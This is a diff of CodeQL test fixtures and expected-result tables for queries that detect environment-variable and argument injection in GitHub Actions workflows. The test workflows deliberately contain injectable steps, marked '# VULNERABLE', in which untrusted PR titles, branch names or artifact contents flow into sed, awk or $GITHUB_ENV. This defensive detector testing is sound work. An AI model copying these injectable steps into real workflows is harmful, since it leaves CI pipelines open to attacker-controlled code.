Config | 
@@ -29,17 +27,15 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | nodes -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | 
@@ -92,13 +88,14 @@ nodes | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable 
injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | 
@@ -130,3 +127,5 @@ subpaths | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 23bc7784f760..94e2af8ecaa7 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -1,6 +1,4 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | 
@@ -29,17 +27,15 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | nodes -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | 
@@ -92,5 +88,8 @@ nodes | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 42ba8bf27496..5d841e50dbb4 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml 
@@ -13,36 +13,62 @@ jobs:
 uses: actions/checkout@v4
 with:
 ref: ${{ github.event.pull_request.head.ref }}
- - run: echo "s/FOO/$TITLE/g"
- - run: sed "s/FOO/$TITLE/g"
- - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar
- - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar)
- - run: awk "BEGIN {$TITLE}"
- - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json
 - run: |
+ # NOT VULNERABLE
+ echo "s/FOO/$TITLE/g"
+ - run: |
+ # VULNERABLE
+ sed "s/FOO/$TITLE/g"
+ - run: |
+ # VULNERABLE
+ echo "foo" | sed "s/FOO/$TITLE/g" > bar
+ - run: |
+ # VULNERABLE
+ echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar)
+ - run: |
+ # VULNERABLE
+ awk "BEGIN {$TITLE}"
+ - run: |
+ # VULNERABLE
+ sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json
+ - run: |
+ # VULNERABLE
 sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json
 - run: |
+ # VULNERABLE
 sed -e 's##${TITLE}#' \
 -e 's##${{ env.sot_repo }}#' \
 -e 's##TITLE#' \
 .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky
 - run: |
+ # VULNERABLE
 sed -e 's##TITLE#' \
 -e 's##${{ env.sot_repo }}#' \
 -e 's##${TITLE}#' \
 .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky
 - run: |
+ # VULNERABLE
 BODY=$(git log --format=%s)
 sed "s/FOO/$BODY/g" > /tmp/foo
-
- - name: Checkout ref
- uses: actions/checkout@v4
- with:
- ref: ${{ github.event.pull_request.head.ref }}
- - name: Detect new changesets
- id: added-files
- run: |
- delimiter="$(openssl rand -hex 8)"
- echo "changesets<<${delimiter}" >> "${GITHUB_OUTPUT}"
- echo "$(git diff --name-only --diff-filter=A ${{ steps.comment-branch.outputs.base_sha }} ${{ steps.parse-sha.outputs.sha }} .changeset/*.md)" >> "${GITHUB_OUTPUT}"
- echo "${delimiter}" >> "${GITHUB_OUTPUT}"
+ - run: |
+ # VULNERABLE
+ BODY=$(git diff --name-only HEAD)
+ sed "s/FOO/$BODY/g" > /tmp/foo
+ - run: |
+ # VULNERABLE
+ BODY=$(git diff --name-only HEAD )
+ sed "s/FOO/$BODY/g" > /tmp/foo
+ - run: |
+ # VULNERABLE
+ BODY=$(git diff --name-only HEAD^ | xargs)
+ sed "s/FOO/$BODY/g" > /tmp/foo
+ - run: |
+ # NOT VULNERABLE
+ echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT
+ - run: |
+ # NOT VULNERABLE
+ git log -1 --pretty=%s
+ - run: |
+ # NOT VULNERABLE
+ BODY=$(git log --format=%s)
+ sed -E 's/\s+/\n/g' <<<"$BODY"
diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
index 1e4051fef432..bd0684d17117 100644
--- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
@@ -1,29 +1,35 @@ edges -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ 